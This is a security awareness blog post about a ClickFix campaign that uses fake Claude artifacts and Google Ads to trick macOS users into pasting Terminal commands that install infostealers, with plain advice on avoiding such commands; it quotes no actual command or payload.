Don’t Paste Terminal Commands From Strangers: How Fake Claude Artifacts Are Fueling a New macOS Malware Wave

Written By Frank Marano

If you’ve ever Googled a quick fix for a Mac issue, you already know the drill: search, skim, click the first result, and hope the instructions don’t break anything. Attackers know this too—and they’re exploiting it with a new twist. A recent campaign is abusing Claude LLM artifacts and Google Ads to trick macOS users into running Terminal commands that quietly install infostealers.

This attack pattern, often called ClickFix, is simple, scalable, and surprisingly effective. And yes—people are still pasting commands from random websites into Terminal.

How the Attack Works

The setup is almost elegant in its simplicity. Threat actors create fake “artifacts” on platforms like Claude—public, AI‑generated guides that look polished and trustworthy. Then they buy Google Ads to push these pages to the top of search results for terms like Homebrew, macOS utilities, and other common troubleshooting queries.

A user clicks the ad, lands on a page that looks helpful, and sees a message claiming something is broken. The page then offers a “quick fix” in the form of a Terminal command. That command doesn’t fix anything—it installs a macOS infostealer such as MacStealer or Atomic Stealer, designed to swipe browser data, keychain items, and crypto wallets.

It’s social engineering disguised as tech support.

Why This Works So Well

Attackers aren’t relying on pop‑ups or scareware anymore. They’re leaning into trust signals:

  • A clean, AI‑generated guide

  • A domain that looks legitimate

  • A Google Ad at the top of the page

  • A command that looks technical enough to feel “official”

For many users, that’s all it takes. If a page looks like documentation, it gets treated like documentation.

And because Claude artifacts are public and easy to generate, attackers can spin up dozens of variations in minutes. It’s phishing, but with better typography.

The Real Risk for macOS Users

macOS has a reputation for being harder to compromise, but that doesn’t matter when the user willingly runs the malicious code. Terminal doesn’t ask whether you trust the stranger who gave you the command—it just executes.

Once installed, these infostealers can:

  • Capture passwords and autofill data

  • Extract browser cookies

  • Access crypto wallets

  • Send system info back to the attacker

All from a single copy‑and‑paste.

How to Protect Yourself

The rule is simple: don’t paste Terminal commands from websites you don’t explicitly trust. If a page claims something is broken and hands you a command to fix it, that’s your cue to close the tab.

Stick to official documentation, verified GitHub repos, and trusted developer sources. And if you’re troubleshooting something unfamiliar, ask someone who knows what they’re doing before running commands you don’t understand.

Final Thoughts

This campaign isn’t clever because of the malware—it’s clever because of the psychology. Attackers don’t need zero‑days when they can convince users to run the payload themselves.

Stay skeptical. Stay curious. And keep your Terminal commands on a strict “friends‑only” basis.

#MacOSMayhem #ClickFixChaos #StopPastingCommands

Frank Marano https://actionablesec.com
Previous

Your Smart TV Is Watching You: How to Lock Down Privacy & Security on Google TV
Next

OpenClaw Strikes Again: Your Favorite AI Assistant Just Became an Infostealer Buffet